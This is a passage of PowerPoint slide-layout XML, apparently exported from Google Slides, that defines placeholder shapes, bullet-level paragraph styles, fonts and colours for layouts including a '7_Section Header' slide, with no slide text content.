              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;108;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6793800" y="1781641"/>
            <a:ext cx="1393800" cy="2750100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="730497"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p11"/>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7_Section Header">
  <p:cSld name="7_Section Header">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="113" name="Shape 113"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191788" y="2421525"/>
            <a:ext cx="1928100" cy="1981500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205394" y="1487935"/>
            <a:ext cx="1928100" cy="851400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000D74"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="171450" lIns="171450" spcFirstLastPara="1" rIns="171450" wrap="square" tIns="171450">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607869" y="1487935"/>
            <a:ext cx="1928100" cy="851400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000D74"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="171450" lIns="171450" spcFirstLastPara="1" rIns="171450" wrap="square" tIns="171450">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6010344" y="1487935"/>
            <a:ext cx="1928100" cy="851400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000D74"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="171450" lIns="171450" spcFirstLastPara="1" rIns="171450" wrap="square" tIns="171450">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205400" y="1612331"/>
            <a:ext cx="1901100" cy="579900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
